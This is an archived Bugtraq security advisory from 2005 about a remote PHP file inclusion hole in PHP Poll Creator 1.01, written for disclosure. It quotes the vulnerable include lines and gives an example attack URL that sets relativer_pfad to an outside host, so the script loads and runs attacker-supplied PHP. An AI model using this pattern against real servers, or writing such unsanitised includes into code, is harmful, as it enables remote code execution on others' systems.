Home page logo
/

bugtraq logo Bugtraq mailing list archives

PHP Injection in PHP Poll Creator
From: rash ilusion <torash () gmail com>
Date: 25 May 2005 05:16:31 -0000



svadvisory#6
-------------------------------------------------------------+
    Title: PHP Injection in PHP Poll Creator                 |
 Software: PHP Poll Creator v 1.01                           |
 Homepage: http://www.phppc.de                  +------------+
   Finder: rash                                 |  24.05.05  |
-------------------------------------------------------------+

Description
-------------------------------------------------------------|

Vulnerability has been found in file poll_vote.php

<?php
include $relativer_pfad . "config.inc.php";
include ($relativer_pfad . "lib/functions.inc.php");
....
?>

one can implement any php code, what we need are it, a delivery
the variable $relativer_pfad over URL, with which defintion our
address to our file with php the code this file must absolutely
config.inc.php is designated, otherwise cannot it not function
where one this file put down are it no matter, main thing one
give the exact address to the file config.inc.php with php the
code to where them are.

Example
-------------------------------------------------------------|

poll_vote.php?relativer_pfad=http://domain.tld/dir/


Conclusion
-------------------------------------------------------------|

as I understood it, this is not any longer developed further
script program, but I go of it out of that, all versions am
concerned, but without guarantee.

#############################################################

rash || Search Vulnerabilities Team || www.svt.nukleon.us


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]